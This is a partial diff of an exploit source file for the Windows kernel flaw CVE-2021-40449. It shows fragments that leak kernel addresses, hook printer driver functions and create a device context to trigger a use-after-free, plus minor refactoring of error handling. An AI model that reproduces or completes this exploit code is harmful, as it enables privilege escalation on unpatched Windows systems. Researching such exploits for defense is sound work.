■ ■ ■ ■ ■ ■
CVE-2021-40449/exploit.cpp
| skipped 34 lines |
35 | 35 | | rtlSetAllBits_address = leak_gadget_address(); |
36 | 36 | | cout << "rtlSetAllBits() on ring0 @ 0x" << hex << rtlSetAllBits_address << endl; |
37 | 37 | | |
38 | | - | setup_hook(); |
39 | | - | |
40 | | - | if (!(uaf_hdc = CreateDCW(NULL, hooked_printer_name, NULL, NULL))) |
| 38 | + | if (!setup_hook()) |
41 | 39 | | goto error; |
42 | 40 | | |
43 | 41 | | uaf = TRUE; |
| skipped 7 lines |
51 | 49 | | |
52 | 50 | | error: |
53 | 51 | | cout << "error @ main()" << endl; |
| 52 | + | system("pause"); |
54 | 53 | | return 1; |
55 | 54 | | } |
56 | 55 | | |
| skipped 103 lines |
160 | 159 | | goto error; |
161 | 160 | | return (DWORD64)drivers[0]; |
162 | 161 | | error: |
163 | | - | cout << "[!] error @ leak_kernel_base_address()" << endl; |
| 162 | + | cout << "[!] error @ leak_module_base_kernel()" << endl; |
164 | 163 | | return FALSE; |
165 | 164 | | } |
166 | 165 | | |
| skipped 143 lines |
310 | 309 | | DrvDisableDriver(); |
311 | 310 | | if (!VirtualProtect(DRVENABLEDATA_ptr.pdrvfn, DRVENABLEDATA_ptr.c * sizeof(PFN), lpflOldProtect, &lpflOldProtect)) |
312 | 311 | | goto error; |
313 | | - | |
| 312 | + | uaf_hdc = CreateDCW(NULL, hooked_printer_name, NULL, NULL); |
| 313 | + | if (uaf_hdc) { |
| 314 | + | return TRUE; |
| 315 | + | } |
314 | 316 | | LocalFree((HLOCAL)printers); |
315 | 317 | | LocalFree((HLOCAL)driver_info); |
316 | | - | return TRUE; |
| 318 | + | |
317 | 319 | | } |
318 | 320 | | error: |
319 | 321 | | printers&& LocalFree((HLOCAL)printers); |
| skipped 98 lines |